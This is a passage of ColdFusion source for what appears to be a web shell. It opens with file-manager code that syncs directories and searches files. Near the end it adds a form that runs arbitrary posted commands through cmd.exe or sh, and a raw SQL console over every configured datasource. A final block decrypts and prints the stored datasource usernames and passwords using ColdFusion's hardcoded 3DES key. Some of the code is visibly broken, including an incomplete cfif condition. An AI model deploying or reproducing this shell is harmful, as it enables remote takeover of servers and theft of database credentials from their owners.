- <cfoutput><div style="color:orange">#attributes.pathNew##attributes.delimiter#<b>#name#</b> ... updated!</div></cfoutput>
- <cfcatch>
- <cfoutput><div style="color:red">#attributes.pathNew##attributes.delimiter#<b>#name#</b> ... cannot update!</div></cfoutput>
- </cfcatch>
- </cftry>
- <cfelse>
- <cfoutput><div>#attributes.pathNew##attributes.delimiter#<b>#name#</b> ... uptodate</div></cfoutput>
- </cfif>
- <cfelse>
- <cffile
- action="COPY"
- source="#attributes.path##attributes.delimiter##name#"
- destination="#attributes.pathNew##attributes.delimiter##name#"
- attributes="Normal">
- <cfoutput><div style="color:green">#attributes.pathNew##attributes.delimiter#<b>#name#</b> ... new!</div></cfoutput>
- </cfif>
- <cfflush>
- </cfif>
- </cfloop>
- <cfloop query="getDir">
- <cfif type eq "dir">
- <cfmodule
- fuseaction="syncDir"
- template="#attributes.thisModule#"
- h="#attributes.H#"
- path="#attributes.path##attributes.delimiter##name#"
- pathNew="#attributes.pathNew##attributes.delimiter##name#"
- relocate="0">
- </cfif>
- </cfloop>
- <cfif attributes.relocate>
- <cfoutput>
- <button name="fileManagerButton" style="width:700" onclick="window.location.href='?h=#attributes.H#&path=#jsStringFormat(attributes.pathNew)#'">Synchronization done! Back to <b>#attributes.pathNew#</b></button>
- </cfoutput>
- </cfif>
- </cfcase>
- <cfcase value="search">
- <cfif attributes.searchtext eq "" and attributes.searchname eq "">
- <cfoutput>#location("msg=Error: no criteria!",attributes.relocate)#</cfoutput>
- </cfif>
- <cfif not isDefined("request.searchResult")>
- <cfset request.searchResult = queryNew("path,name,type,size,datelastmodified,attributes")>
- <cfset attributes.searchpath = attributes.path>
- </cfif>
- <cfset countsearchresult = request.searchResult.recordCount>
- <cftry>
- <cfdirectory action="LIST" directory="#attributes.searchpath#" name="getDir">
- <!--- Search files --->
- <cfloop query="getDir">
- <cfif attributes.maxsearchresult lte countsearchresult>
- <cfbreak>
- </cfif>
- <cfif type eq "file">
- <cfset isOK = 1>
- <cfif attributes.searchname neq "">
- <cfset isOK = REFindNoCase(attributes.searchname,name)>
- </cfif>
- <cfif attributes.searchtext neq "" and isOK eq 1>
- <cffile action="READ" file="#attributes.searchpath##attributes.delimiter##name#" variable="filecontent">
- <cfset isOK = REFindNoCase(attributes.searchtext,filecontent)>
- </cfif>
- <cfif isOK>
- <cfset tmp = queryAddRow(request.searchResult)>
- <cfset tmp = querySetCell(request.searchResult,"path",attributes.searchpath)>
- <cfset tmp = querySetCell(request.searchResult,"name",name)>
- <cfset tmp = querySetCell(request.searchResult,"type",type)>
- <cfset tmp = querySetCell(request.searchResult,"size",size)>
- <cfset tmp = querySetCell(request.searchResult,"datelastmodified",datelastmodified)>
- <cfset tmp = querySetCell(request.searchResult,"attributes",attributes)>
- <cfset countsearchresult = countsearchresult + 1>
- </cfif>
- </cfif>
- </cfloop>
- <!--- Search dir --->
- <cfloop query="getDir">
- <cfif attributes.maxsearchresult lte countsearchresult>
- <cfbreak>
- </cfif>
- <cfif type eq "dir" and name neq "." and name neq "..">
- <cfif attributes.searchname neq "" and REFindNoCase(attributes.searchname,name)>
- <cfset tmp = queryAddRow(request.searchResult)>
- <cfset tmp = querySetCell(request.searchResult,"path",attributes.searchpath)>
- <cfset tmp = querySetCell(request.searchResult,"name",name)>
- <cfset tmp = querySetCell(request.searchResult,"type",type)>
- <cfset tmp = querySetCell(request.searchResult,"size",size)>
- <cfset tmp = querySetCell(request.searchResult,"datelastmodified",datelastmodified)>
- <cfset tmp = querySetCell(request.searchResult,"attributes",attributes)>
- <cfset countsearchresult = countsearchresult + 1>
- </cfif>
- </cfif>
- </cfloop>
- <!--- Search in sub dir --->
- <cfif attributes.recursive eq 1>
- <cfloop query="getDir">
- <cfif attributes.maxsearchresult lte countsearchresult>
- <cfbreak>
- </cfif>
- <cfif type eq "dir" and name neq "." and name neq "..">
- <cfmodule template="#attributes.thisModule#"
- fuseaction="search"
- path="#attributes.path#"
- h="#attributes.h#"
- searchpath="#attributes.searchpath##attributes.delimiter##name#"
- recursive="#attributes.recursive#"
- searchtext="#attributes.searchtext#"
- searchname="#attributes.searchname#"
- maxsearchresult="#attributes.maxsearchresult#"
- relocate="0">
- </cfif>
- </cfloop>
- </cfif>
- <cfcatch>
- <cfoutput>#location("msg=Error!",attributes.relocate)#</cfoutput>
- </cfcatch>
- </cftry>
- <!--- Show result --->
- <cfif attributes.relocate>
- <cfset caller.getDir = request.searchResult>
- <cfmodule template="#attributes.thisModule#"
- fuseaction="home"
- path="#attributes.path#"
- h="#attributes.h#"
- msg="Search result: #request.searchResult.recordCount# elements!"
- getDir="#request.searchResult#"
- showpath="#iif(attributes.recursive,1,0)#"
- searchtext="#attributes.searchtext#"
- searchname="#attributes.searchname#"
- maxsearchresult="#attributes.maxsearchresult#">
- </cfif>
- </cfcase>
- </cfswitch>
- </br></br>
- <cfoutput>
- <!--<table>-->
- <cfset tempFile = #GetTempFile(GetTempDirectory(),"testFile")# />
- <cfif IsDefined("FORM.cmd")>
- <cfoutput>#cmd#</cfoutput>
- <cfif neq "UNIX">
- <cfexecute name="cmd.exe" arguments="/c #cmd#" outputfile="#tempFile#" timeout="2000"></cfexecute>
- <cfelse>
- <cfexecute name="sh" arguments="-c ""#REReplace(cmd,"""","'","ALL")#""" outputfile="#tempFile#" timeout="2000"></cfexecute>
- </cfif>
- </cfif>
- <form action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" method="post">
- <input type=text size=45 name="cmd" >
- <input type=Submit value="run">
- </form>
- <cfif FileExists("#tempFile#") is "Yes">
- <cffile action="Read" file="#tempFile#" variable="readText">
- <textarea readonly cols=80 rows=20>
- </textarea>
- <cffile action="Delete" file="#tempFile#">
- </cfif>
- </cfoutput>
- </br></br>
- <p><b>Notes:</b></p>
- <ul>
- <li>Select the database you want to use</li>
- <li>Write SQL statements in the text box</li>
- </ul>
- <form method="POST" action="">
- <p><b>SQL Interface:</b></p>
- Datasource<br>
- <select name="datasource">
- <cfscript>
- dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
- getDatasourceService().getDatasources();
- for(i in dataSourceObb) {
- writeoutput('<option value="' & i & '">' & i & '</option>');
- }
- </cfscript>
- </select>
- <br>
- SQL<br>
- <textarea name="sql" rows="5" cols="100"></textarea>
- <br>
- <input type=submit value="Exec">
- </form>
- <cfif isdefined("form.sql")>
- <cfquery name="runsql" datasource="#Form.datasource#" timeout="30">
- #Form.sql#
- </cfquery>
- </cfif>
- <table border=1>
- <cfif isdefined("form.sql")>
- <cfloop from="0" to="#runsql.RecordCount#" index="row">
- <cfif row eq 0>
- <tr>
- <cfloop list="#runsql.ColumnList#" index="column" delimiters=",">
- <th><cfoutput>#column#</cfoutput></th>
- </cfloop>
- </tr>
- <cfelse>
- <tr>
- <cfloop list="#runsql.ColumnList#" index="column" delimiters=",">
- <td><cfoutput>#runsql[column][row]#</cfoutput></td>
- </cfloop>
- </tr>
- </cfif>
- </cfloop>
- </cfif>
- </table>
- </br> </br>
- <cfscript>
- dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
- getDatasourceService().getDatasources();
- writeoutput("<br><br><b>Datasource Credentials:</b><br>");
- writeoutput("<table>");
- for(i in dataSourceObb) {
- if(len(dataSourceObb[i]["password"])){
- theurl=(dataSourceObb[i]["url"]);
- username=(dataSourceObb[i]["username"]);
- decryptPassword=Decrypt(dataSourceObb[i]["password"],
- generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede",
- "Base64");
- writeoutput("" &
- "<tr><td>DataSource: " & i & "</td>" &
- "<td>Username: " & username & "</td>" &
- "<td>Password: " & decryptPassword &
- "<td>URL: " & theurl & "</td></tr>");
- }
- }
- writeoutput("</table><br>");
- </cfscript>
- </body>
- </html>
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